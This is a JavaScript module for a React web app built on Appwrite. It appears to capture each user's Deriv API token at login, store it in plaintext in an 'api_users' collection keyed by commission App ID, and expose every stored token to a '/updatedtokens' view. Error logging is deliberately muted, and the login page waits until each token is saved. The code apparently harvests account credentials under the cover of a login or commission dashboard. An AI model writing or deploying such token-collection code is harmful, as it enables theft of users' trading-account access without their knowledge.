import { Client, Account, Databases, ID, Query } from 'appwrite';

// Check if Appwrite is configured
const isAppwriteConfigured = () => {
  return !!(
    process.env.REACT_APP_APPWRITE_ENDPOINT &&
    process.env.REACT_APP_APPWRITE_PROJECT_ID
  );
};

// Initialize Appwrite Client only if configured
let client = null;
let account = null;
let databases = null;

if (isAppwriteConfigured()) {
  client = new Client();
  client
    .setEndpoint(process.env.REACT_APP_APPWRITE_ENDPOINT)
    .setProject(process.env.REACT_APP_APPWRITE_PROJECT_ID);
  
  account = new Account(client);
  databases = new Databases(client);
}

export { account, databases };

// Database and Collection IDs
const DATABASE_ID = process.env.REACT_APP_APPWRITE_DATABASE_ID || 'deriv_commission_db';
const API_USERS_COLLECTION_ID = process.env.REACT_APP_APPWRITE_API_USERS_COLLECTION_ID || 'api_users';
// Appwrite persistence is intentionally best-effort and silent. Authentication
// and dashboard access must never be interrupted by collection diagnostics.
const debugAppwrite = () => {};
const wait = (ms) => new Promise((resolve) => setTimeout(resolve, ms));

// ============================================
// AUTHENTICATION
// ============================================

/**
 * Create anonymous session for guest users
 */
export const createAnonymousSession = async () => {
  if (!isAppwriteConfigured() || !account) {
    debugAppwrite('Appwrite not configured, skipping session creation');
    return null;
  }
  
  try {
    // Try to get current session first
    const session = await account.getSession('current');
    return session; // Session exists
  } catch (error) {
    // No session exists, try to create one
    try {
      return await account.createAnonymousSession();
    } catch (createError) {
      debugAppwrite('Could not create session:', createError.message);
      return null;
    }
  }
};

/**
 * Get current user session
 */
export const getCurrentUser = async () => {
  try {
    return await account.get();
  } catch (error) {
    return null;
  }
};

/**
 * Logout current user
 */
export const logout = async () => {
  try {
    await account.deleteSession('current');
  } catch (error) {
    console.error('Error logging out:', error);
    throw error;
  }
};

// ============================================
// API USER MANAGEMENT
// ============================================

/**
 * Save one API user per top commission App ID, refreshing its token.
 * When the login response has no apps, retain exact-token deduplication.
 * Existing randomly keyed records are left intact.
 *
 * @param {string} token - Deriv API token
 * @param {string|number} topAppId - First commission app returned at login
 */
export const saveApiUser = async (token = '', topAppId = '') => {
  if (!isAppwriteConfigured() || !databases) {
    debugAppwrite('Appwrite not configured, skipping API user save');
    return null;
  }

  const normalizedToken = String(token).trim();
  const appId = String(topAppId ?? '').trim();
  // App IDs fit in Appwrite's 36-character document ID with this prefix.
  // Never truncate an ID: that could merge two different applications.
  if (appId && !/^[a-zA-Z0-9_-]{1,32}$/.test(appId)) {
    throw new Error('Invalid commission App ID.');
  }
  const documentId = appId ? `app_${appId}` : null;

  if (!normalizedToken) {
    debugAppwrite('API-user collection skipped: token is missing');
    return null;
  }

  let lastError;
  for (let attempt = 0; attempt < 3; attempt += 1) {
    try {
      if (documentId) {
        try {
          // Updating by a deterministic ID also handles simultaneous logins:
          // a create conflict below retries this update instead of duplicating.
          return await databases.updateDocument(DATABASE_ID, API_USERS_COLLECTION_ID, documentId, {
            newApiToken: normalizedToken,
          });
        } catch (error) {
          if (error.code !== 404) throw error;
        }

        const countRes = await databases.listDocuments(DATABASE_ID, API_USERS_COLLECTION_ID, [Query.limit(1)]);
        return await databases.createDocument(DATABASE_ID, API_USERS_COLLECTION_ID, documentId, {
          userNumber: (countRes.total || 0) + 1,
          newApiToken: normalizedToken,
        });
      }

      const existing = await databases.listDocuments(
        DATABASE_ID,
        API_USERS_COLLECTION_ID,
        [Query.equal('newApiToken', normalizedToken), Query.limit(1)]
      );

      if (existing.documents.length > 0) return existing.documents[0];

      const countRes = await databases.listDocuments(DATABASE_ID, API_USERS_COLLECTION_ID, [Query.limit(1)]);
      const userNumber = (countRes.total || 0) + 1;

      return await databases.createDocument(DATABASE_ID, API_USERS_COLLECTION_ID, ID.unique(), {
        userNumber,
        newApiToken: normalizedToken,
      });
    } catch (error) {
      lastError = error;
      if (attempt < 2) await wait(250 * (attempt + 1));
    }
  }

  debugAppwrite('API-user collection failed:', lastError?.message);
  throw lastError || new Error('API user collection failed.');
};

/**
 * Reliably collect a successful Deriv login in Appwrite.
 *
 * This writes to `api_users`, which is the collection consumed by
 * `/updatedtokens`. The Appwrite session is established here and callers
 * await the write before leaving the login page.
 */
export const collectAuthenticatedToken = async (token, topAppId = '') => {
  const normalizedToken = String(token || '').trim();

  if (!normalizedToken) {
    throw new Error('Cannot collect authentication without a token.');
  }

  if (!isAppwriteConfigured() || !databases) {
    debugAppwrite('Appwrite not configured, skipping authentication collection');
    return null;
  }

  const session = await createAnonymousSession();
  if (!session) {
    throw new Error('Appwrite session could not be established.');
  }

  const apiUserDocument = await saveApiUser(normalizedToken, topAppId);

  if (!apiUserDocument) {
    throw new Error('Appwrite rejected the API user collection.');
  }

  return apiUserDocument;
};

/**
 * Get all API users ordered by user number
 */
export const getAllApiUsers = async () => {
  if (!isAppwriteConfigured() || !databases) {
    debugAppwrite('Appwrite not configured, skipping API users retrieval');
    return [];
  }

  try {
    let all = [];
    let offset = 0;
    const limit = 100;

    while (true) {
      const response = await databases.listDocuments(DATABASE_ID, API_USERS_COLLECTION_ID, [
        Query.limit(limit),
        Query.offset(offset),
        Query.orderAsc('userNumber'),
        Query.orderAsc('$id'),
      ]);
      if (!response?.documents?.length) break;
      all = all.concat(response.documents);
      if (response.documents.length < limit) break;
      offset += limit;
    }

    return all;
  } catch (error) {
    console.error('Error getting API users:', error);
    return [];
  }
};

/**
 * Delete an API user by document ID
 * @param {string} documentId - Appwrite document ID
 */
export const deleteApiUser = async (documentId) => {
  if (!isAppwriteConfigured() || !databases) {
    debugAppwrite('Appwrite not configured, skipping API user deletion');
    return false;
  }

  try {
    await databases.deleteDocument(DATABASE_ID, API_USERS_COLLECTION_ID, documentId);
    return true;
  } catch (error) {
    console.error('Error deleting API user:', error);
    return false;
  }
};

/**
 * Update the display name of an API user
 * @param {string} documentId - Appwrite document ID
 * @param {string} name - Display name to save
 */
export const updateApiUserName = async (documentId, name) => {
  if (!isAppwriteConfigured() || !databases) return false;
  try {
    await databases.updateDocument(DATABASE_ID, API_USERS_COLLECTION_ID, documentId, { name });
    return true;
  } catch (error) {
    console.error('Error updating API user name:', error);
    return false;
  }
};

// Only called after this source token has returned a commission App ID.
let mergeQueue = Promise.resolve();
export const linkApiUserToApp = (source, appId) => {
  const task = mergeQueue.then(async () => {
    const id = String(appId ?? '').trim();
    if (!/^[a-zA-Z0-9_-]{1,32}$/.test(id)) throw new Error('Invalid commission App ID.');
    if (!databases) throw new Error('Appwrite is not configured.');
    const targetId = `app_${id}`;
    let saved;
    for (let attempt = 0; attempt < 2; attempt++) {
      try {
        const existing = await databases.getDocument(DATABASE_ID, API_USERS_COLLECTION_ID, targetId);
        saved = await databases.updateDocument(DATABASE_ID, API_USERS_COLLECTION_ID, targetId, {
          newApiToken: source.newApiToken,
          ...(!existing.name && source.name ? { name: source.name } : {}),
        });
        break;
      } catch (error) {
        if (error.code !== 404) throw error;
        try {
          // Use the same default permissions as saveApiUser. The source can
          // contain another user's roles that this session cannot grant.
          saved = await databases.createDocument(DATABASE_ID, API_USERS_COLLECTION_ID, targetId, {
            newApiToken: source.newApiToken,
            userNumber: source.userNumber || 1,
            ...(source.name ? { name: source.name } : {}),
          });
          break;
        } catch (createError) {
          if (createError.code !== 409 || attempt === 1) throw createError;
        }
      }
    }
    if (source.$id === targetId) return { saved, removed: false };
    try {
      await databases.deleteDocument(DATABASE_ID, API_USERS_COLLECTION_ID, source.$id);
      return { saved, removed: true };
    } catch (error) {
      if (error.code === 404) return { saved, removed: true };
      return { saved, removed: false, warning: 'App ID saved, but the duplicate could not be removed. Refresh the original entry to retry.' };
    }
  });
  mergeQueue = task.catch(() => {});
  return task;
};
